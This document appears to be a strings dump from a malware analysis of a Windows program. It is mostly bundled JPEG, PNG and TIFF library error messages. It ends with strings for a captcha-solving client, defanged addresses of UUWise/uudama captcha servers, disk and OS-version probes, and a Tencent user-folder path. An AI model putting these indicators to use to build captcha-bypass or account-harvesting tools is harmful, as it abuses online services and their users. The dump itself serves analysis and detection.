Define Restart Interval %u
Define Restart Interval %u
Define Quantization Table %d precision %d
Define Quantization Table %d precision %d
Define Huffman Table 0xx
Define Huffman Table 0xx
Define Arithmetic Table 0xx: 0xx
Define Arithmetic Table 0xx: 0xx
Unknown APP14 marker (not Adobe), length %u
Unknown APP14 marker (not Adobe), length %u
Unknown APP0 marker (not JFIF), length %u
Unknown APP0 marker (not JFIF), length %u
Adobe APP14 marker: version %d, flags 0xx 0xx, transform %d
Adobe APP14 marker: version %d, flags 0xx 0xx, transform %d
Unsupported marker type 0xx
Unsupported marker type 0xx
Failed to create temporary file %s
Failed to create temporary file %s
Unsupported JPEG process: SOF type 0xx
Unsupported JPEG process: SOF type 0xx
Cannot quantize to more than %d colors
Cannot quantize to more than %d colors
Cannot quantize to fewer than %d colors
Cannot quantize to fewer than %d colors
Cannot quantize more than %d color components
Cannot quantize more than %d color components
Insufficient memory (case %d)
Insufficient memory (case %d)
Not a JPEG file: starts with 0xx 0xx
Not a JPEG file: starts with 0xx 0xx
Quantization table 0xx was not defined
Quantization table 0xx was not defined
Huffman table 0xx was not defined
Huffman table 0xx was not defined
Backing store not supported
Backing store not supported
Arithmetic table 0xx was not defined
Arithmetic table 0xx was not defined
Cannot transcode due to multiple use of quantization table %d
Cannot transcode due to multiple use of quantization table %d
Maximum supported image dimension is %u pixels
Maximum supported image dimension is %u pixels
Empty JPEG image (DNL not supported)
Empty JPEG image (DNL not supported)
Bogus DQT index %d
Bogus DQT index %d
Bogus DHT index %d
Bogus DHT index %d
Bogus DAC value 0x%x
Bogus DAC value 0x%x
Bogus DAC index %d
Bogus DAC index %d
Unsupported color conversion request
Unsupported color conversion request
Too many color components: %d, max %d
Too many color components: %d, max %d
Buffer passed to JPEG library is too small
Buffer passed to JPEG library is too small
JPEG parameter struct mismatch: library thinks size is %u, caller expects %u
JPEG parameter struct mismatch: library thinks size is %u, caller expects %u
Improper call to JPEG library in state %d
Improper call to JPEG library in state %d
Invalid scan script at entry %d
Invalid scan script at entry %d
Invalid progressive parameters at scan script entry %d
Invalid progressive parameters at scan script entry %d
Invalid progressive parameters Ss=%d Se=%d Ah=%d Al=%d
Invalid progressive parameters Ss=%d Se=%d Ah=%d Al=%d
Unsupported JPEG data precision %d
Unsupported JPEG data precision %d
Invalid memory pool code %d
Invalid memory pool code %d
Wrong JPEG library version: library is %d, caller expects %d
Wrong JPEG library version: library is %d, caller expects %d
Component index %d: mismatching sampling ratio %d:%d, %d:%d, %c
Component index %d: mismatching sampling ratio %d:%d, %d:%d, %c
DCT scaled block size %dx%d not supported
DCT scaled block size %dx%d not supported
Invalid component ID %d in SOS
Invalid component ID %d in SOS
NULL row buffer for row %ld, pass %d
NULL row buffer for row %ld, pass %d
libpng error: %s
libpng error: %s
libpng warning: %s
libpng warning: %s
Unknown zTXt compression type %d
Unknown zTXt compression type %d
gamma = (%d/100000)
gamma = (%d/100000)
gx=%f, gy=%f, bx=%f, by=%f
gx=%f, gy=%f, bx=%f, by=%f
wx=%f, wy=%f, rx=%f, ry=%f
wx=%f, wy=%f, rx=%f, ry=%f
incorrect gamma=(%d/100000)
incorrect gamma=(%d/100000)
%s: Cannot open
%s: Cannot open
%s: Write error at scanline %lu
%s: Write error at scanline %lu
%s: Seek error at scanline %lu
%s: Seek error at scanline %lu
%u: Sample out of range, max %u
%u: Sample out of range, max %u
%s: Cannot modify tag "%s" while writing
%s: Cannot modify tag "%s" while writing
%s: Unknown %stag %u
%s: Unknown %stag %u
%f: Bad value for "%s"
%f: Bad value for "%s"
%s: Invalid %stag "%s" (not supported by codec)
%s: Invalid %stag "%s" (not supported by codec)
TIFFVSetField ... pass by value not imp.
TIFFVSetField ... pass by value not imp.
%ld: Bad value for "%s"
%ld: Bad value for "%s"
%d: Bad value for "%s"
%d: Bad value for "%s"
Nonstandard tile length %d, convert file
Nonstandard tile length %d, convert file
Nonstandard tile width %d, convert file
Nonstandard tile width %d, convert file
Bad value %ld for "%s" tag ignored
Bad value %ld for "%s" tag ignored
%s: Invalid InkNames value; expecting %d names, found %d
%s: Invalid InkNames value; expecting %d names, found %d
TIFFVGetField ... pass by value not imp.
TIFFVGetField ... pass by value not imp.
Sorry, can not handle images with %d-bit samples
Sorry, can not handle images with %d-bit samples
Sorry, can not handle LogLuv images with %s=%d
Sorry, can not handle LogLuv images with %s=%d
Sorry, LogLuv data must have %s=%d or %d
Sorry, LogLuv data must have %s=%d or %d
Sorry, can not handle image with %s=%d
Sorry, can not handle image with %s=%d
Sorry, LogL data must have %s=%d
Sorry, LogL data must have %s=%d
Sorry, can not handle separated image with %s=%d
Sorry, can not handle separated image with %s=%d
Sorry, can not handle RGB image with %s=%d
Sorry, can not handle RGB image with %s=%d
Sorry, can not handle YCbCr images with %s=%d
Sorry, can not handle YCbCr images with %s=%d
Sorry, can not handle contiguous data with %s=%d, and %s=%d and Bits/Sample=%d
Sorry, can not handle contiguous data with %s=%d, and %s=%d and Bits/Sample=%d
Missing needed %s tag
Missing needed %s tag
Sorry, can not image with %d-bit samples
Sorry, can not image with %d-bit samples
"%s": Bad mode
"%s": Bad mode
Not a TIFF file, bad version number %d (0x%x)
Not a TIFF file, bad version number %d (0x%x)
Not a TIFF file, bad magic number %d (0x%x)
Not a TIFF file, bad magic number %d (0x%x)
%s: Out of memory (TIFF structure)
%s: Out of memory (TIFF structure)
Sample %d out of range, max %u
Sample %d out of range, max %u
Internal error, unknown tag 0x%x
Internal error, unknown tag 0x%x
Tag %d
Tag %d
%s: Read error at scanline %lu, strip %lu; got %lu bytes, expected %lu
%s: Read error at scanline %lu, strip %lu; got %lu bytes, expected %lu
%s: Read error at scanline %lu; got %lu bytes, expected %lu
%s: Read error at scanline %lu; got %lu bytes, expected %lu
%s: Seek error at scanline %lu, strip %lu
%s: Seek error at scanline %lu, strip %lu
%s: Data buffer too small to hold strip %lu
%s: Data buffer too small to hold strip %lu
%s: Read error on strip %lu; got %lu bytes, expected %lu
%s: Read error on strip %lu; got %lu bytes, expected %lu
%s: Read error at row %ld, col %ld, tile %ld; got %lu bytes, expected %lu
%s: Read error at row %ld, col %ld, tile %ld; got %lu bytes, expected %lu
%s: Read error at row %ld, col %ld; got %lu bytes, expected %lu
%s: Read error at row %ld, col %ld; got %lu bytes, expected %lu
%s: Seek error at row %ld, col %ld, tile %ld
%s: Seek error at row %ld, col %ld, tile %ld
%s: Data buffer too small to hold tile %ld
%s: Data buffer too small to hold tile %ld
%s: No space for data buffer at scanline %ld
%s: No space for data buffer at scanline %ld
Compression scheme %u %s encoding is not implemented
Compression scheme %u %s encoding is not implemented
%s %s encoding is not implemented
%s %s encoding is not implemented
%s %s encoding is no longer implemented due to Unisys patent enforcement
%s %s encoding is no longer implemented due to Unisys patent enforcement
Compression scheme %u %s decoding is not implemented
Compression scheme %u %s decoding is not implemented
%s %s decoding is not implemented
%s %s decoding is not implemented
Compression algorithm does not support random access
Compression algorithm does not support random access
Bogus "%s" field, ignoring and calculating from imagelength
Bogus "%s" field, ignoring and calculating from imagelength
TIFF directory is missing required "%s" field, calculating from imagelength
TIFF directory is missing required "%s" field, calculating from imagelength
wrong data type %d for "%s"; tag ignored
wrong data type %d for "%s"; tag ignored
unknown field with tag %d (0x%x) encountered
unknown field with tag %d (0x%x) encountered
No space %s
No space %s
TIFF directory is missing required "%s" field
TIFF directory is missing required "%s" field
incorrect count for field "%s" (%lu, expecting %lu); tag ignored
incorrect count for field "%s" (%lu, expecting %lu); tag ignored
Error fetching data for field "%s"
Error fetching data for field "%s"
%s: Rational with zero denominator (num = %lu)
%s: Rational with zero denominator (num = %lu)
Cannot handle different per-sample values for field "%s"
Cannot handle different per-sample values for field "%s"
cannot read TIFF_ANY type %d for field "%s"
cannot read TIFF_ANY type %d for field "%s"
"%s": Information lost writing value (%g) as (unsigned) RATIONAL
"%s": Information lost writing value (%g) as (unsigned) RATIONAL
Error writing data for field "%s"
Error writing data for field "%s"
%s: Error writing SubIFD directory link
%s: Error writing SubIFD directory link
%s compression support is not configured
%s compression support is not configured
?%s: No space for LogLuv state block
?%s: No space for LogLuv state block
Inappropriate photometric interpretation %d for SGILog compression; %s
Inappropriate photometric interpretation %d for SGILog compression; %s
LogL16Decode: Not enough data at row %d (short %d pixels)
LogL16Decode: Not enough data at row %d (short %d pixels)
LogLuvDecode24: Not enough data at row %d (short %d pixels)
LogLuvDecode24: Not enough data at row %d (short %d pixels)
LogLuvDecode32: Not enough data at row %d (short %d pixels)
LogLuvDecode32: Not enough data at row %d (short %d pixels)
%s: No space for SGILog translation buffer
%s: No space for SGILog translation buffer
No support for converting user data format to LogL
No support for converting user data format to LogL
No support for converting user data format to LogLuv
No support for converting user data format to LogLuv
SGILog compression supported only for %s, or raw data
SGILog compression supported only for %s, or raw data
Unknown data format %d for LogLuv compression
Unknown data format %d for LogLuv compression
Unknown encoding %d for LogLuv compression
Unknown encoding %d for LogLuv compression
%s: No space for state block
%s: No space for state block
%s: Bad code word at scanline %d (x %lu)
%s: Bad code word at scanline %d (x %lu)
%s: %s at scanline %d (got %lu, expected %lu)
%s: %s at scanline %d (got %lu, expected %lu)
%s: Premature EOF at scanline %d (x %lu)
%s: Premature EOF at scanline %d (x %lu)
%s: No space for Group 3/4 reference line
%s: No space for Group 3/4 reference line
%s: No space for Group 3/4 run arrays
%s: No space for Group 3/4 run arrays
%s: Uncompressed data (not supported) at scanline %d (x %lu)
%s: Uncompressed data (not supported) at scanline %d (x %lu)
Fax SubAddress: %s
Fax SubAddress: %s
(%u = 0x%x)
(%u = 0x%x)
%suncompressed data
%suncompressed data
%sEOL padding
%sEOL padding
%s2-d encoding
%s2-d encoding
Improper JPEG sampling factors %d,%d
Improper JPEG sampling factors %d,%d
Apparently should be %d,%d,decompressor will try reading with sampling %d,%d
Apparently should be %d,%d,decompressor will try reading with sampling %d,%d
Improper JPEG strip/tile size, expected %dx%d, got %dx%d
Improper JPEG strip/tile size, expected %dx%d, got %dx%d
RowsPerStrip must be multiple of %d for JPEG
RowsPerStrip must be multiple of %d for JPEG
JPEG tile width must be multiple of %d
JPEG tile width must be multiple of %d
JPEG tile height must be multiple of %d
JPEG tile height must be multiple of %d
BitsPerSample %d not allowed for JPEG
BitsPerSample %d not allowed for JPEG
PhotometricInterpretation %d not allowed for JPEG
PhotometricInterpretation %d not allowed for JPEG
ThunderDecode: %s data at scanline %ld (%lu != %lu)
ThunderDecode: %s data at scanline %ld (%lu != %lu)
PackBitsDecode: discarding %d bytes to avoid buffer overrun
PackBitsDecode: discarding %d bytes to avoid buffer overrun
LZWDecode: Not enough data at scanline %d (short %d bytes)
LZWDecode: Not enough data at scanline %d (short %d bytes)
LZWDecode: Strip %d not terminated with EOI code
LZWDecode: Strip %d not terminated with EOI code
LZWDecode: Bogus encoding, loop in the code table; scanline %d
LZWDecode: Bogus encoding, loop in the code table; scanline %d
LZWDecodeCompat: Not enough data at scanline %d (short %d bytes)
LZWDecodeCompat: Not enough data at scanline %d (short %d bytes)
DumpModeDecode: Not enough data for scanline %d
DumpModeDecode: Not enough data for scanline %d
Horizontal differencing "Predictor" not supported with %d-bit samples
Horizontal differencing "Predictor" not supported with %d-bit samples
"Predictor" value %d not supported
"Predictor" value %d not supported
%u (0x%x)
%u (0x%x)
.PAVCOleException@@
.PAVCOleException@@
.PAVCOleDispatchException@@
.PAVCOleDispatchException@@
c:\%original file name%.exe
c:\%original file name%.exe
CCaptchaRecognizer::recognizeByCodeTypeAndUrl
CCaptchaRecognizer::recognizeByCodeTypeAndUrl
hXXp://s1.uudati.com:
hXXp://s1.uudati.com:
hXXp://s1.taskok.com:
hXXp://s1.taskok.com:
hXXp://s1.uudama.com:
hXXp://s1.uudama.com:
hXXp://s1.uuwise.com:
hXXp://s1.uuwise.com:
/Api/config.aspx
/Api/config.aspx
2.0.0.4
2.0.0.4
WiseClientAPI-2.0.0.4
WiseClientAPI-2.0.0.4
CCaptchaRecognizer::__UpdateTKEY
CCaptchaRecognizer::__UpdateTKEY
CCaptchaRecognizer::_IsNeedLogin
CCaptchaRecognizer::_IsNeedLogin
/Api/DecodeImg.aspx
/Api/DecodeImg.aspx
xxxxxxxxxxx
xxxxxxxxxxx
hXXp://p1.uuwise.net:
hXXp://p1.uuwise.net:
hXXp://p1.uudama.net:
hXXp://p1.uudama.net:
hXXp://p1.taskok.com:
hXXp://p1.taskok.com:
hXXp://p1.uuwise.com:
hXXp://p1.uuwise.com:
hXXp://p1.uudama.com:
hXXp://p1.uudama.com:
CCaptchaRecognizer::easyRecognizeUrl
CCaptchaRecognizer::easyRecognizeUrl
%d%d%d%d%d
%d%d%d%d%d
CCaptchaRecognizer::_CalcRandomPort
CCaptchaRecognizer::_CalcRandomPort
/Api/VerifyAPIFile.aspx
/Api/VerifyAPIFile.aspx
/Api/UserLogin.aspx
/Api/UserLogin.aspx
CCaptchaRecognizer::login
CCaptchaRecognizer::login
/Api/UserReg.aspx
/Api/UserReg.aspx
/Api/PayCard.aspx
/Api/PayCard.aspx
/Api/ReportError.aspx
/Api/ReportError.aspx
CCaptchaRecognizer::reportError
CCaptchaRecognizer::reportError
/Api/UserPoint.aspx
/Api/UserPoint.aspx
|2.0.0.4|
|2.0.0.4|
/Api/DecodeResult.aspx
/Api/DecodeResult.aspx
ID/KEY/
ID/KEY/
ByTypeBytes.JPG
ByTypeBytes.JPG
%d-%d-%d
%d-%d-%d
CHttpRequestHelper::_ReadResponse
CHttpRequestHelper::_ReadResponse
User-Agent:WiseClient-2.0.0.4;
User-Agent:WiseClient-2.0.0.4;
WiseClient-2.0.0.4
WiseClient-2.0.0.4
CHttpRequestHelper::_InternalRequest
CHttpRequestHelper::_InternalRequest
CHttpRequestHelper::RequestGetImage
CHttpRequestHelper::RequestGetImage
CHttpRequestHelper::RequestPost
CHttpRequestHelper::RequestPost
ServerPort
ServerPort
UUExtConfig.ini
UUExtConfig.ini
-:-:-.%d
-:-:-.%d
tCRYPTDLL.DLL
tCRYPTDLL.DLL
3.cn.pool.ntp.org
3.cn.pool.ntp.org
2.cn.pool.ntp.org
2.cn.pool.ntp.org
1.cn.pool.ntp.org
1.cn.pool.ntp.org
0.cn.pool.ntp.org
0.cn.pool.ntp.org
cn.pool.ntp.org
cn.pool.ntp.org
\\.\PHYSICALDRIVE0
\\.\PHYSICALDRIVE0
Microsoft Windows Millennium Edition
Microsoft Windows Millennium Edition
Microsoft Windows 98
Microsoft Windows 98
Microsoft Windows 95
Microsoft Windows 95
%s (Build %d)
%s (Build %d)
Service Pack 6a (Build %d)
Service Pack 6a (Build %d)
SOFTWARE\Microsoft\Windows NT\CurrentVersion\Hotfix\Q246009
SOFTWARE\Microsoft\Windows NT\CurrentVersion\Hotfix\Q246009
Web Edition
Web Edition
Service Pack %d (Build %d)
Service Pack %d (Build %d)
Microsoft Windows NT
Microsoft Windows NT
Microsoft Windows 2000
Microsoft Windows 2000
Microsoft Windows XP
Microsoft Windows XP
Microsoft Windows Server 2003,
Microsoft Windows Server 2003,
Microsoft Windows XP Professional x64 Edition
Microsoft Windows XP Professional x64 Edition
Microsoft Windows Server 2003 "R2"
Microsoft Windows Server 2003 "R2"
Windows Server 2008
Windows Server 2008
Windows Vista
Windows Vista
Windows Server 2008 R2
Windows Server 2008 R2
Windows 7
Windows 7
ox-x-x-x-x-x
ox-x-x-x-x-x
\Tencent\Users\*.*
\Tencent\Users\*.*
nKERNEL32.DLL
nKERNEL32.DLL
mscoree.dll
mscoree.dll
- Attempt to initialize the CRT more than once.
- Attempt to initialize the CRT more than once.
- CRT not initialized
- CRT not initialized
- floating point support not loaded
- floating point support not loaded
WUSER32.DLL
WUSER32.DLL
!"#$%&'()* ,-.
!"#$%&'()* ,-.
uuwise.com
uuwise.com
2, 0, 0, 4
2, 0, 0, 4
1.0.0.1
1.0.0.1
123456789
123456789
(*.*)
(*.*)
1.0.0.0
1.0.0.0
(hXXp://VVV.eyuyan.com)
(hXXp://VVV.eyuyan.com)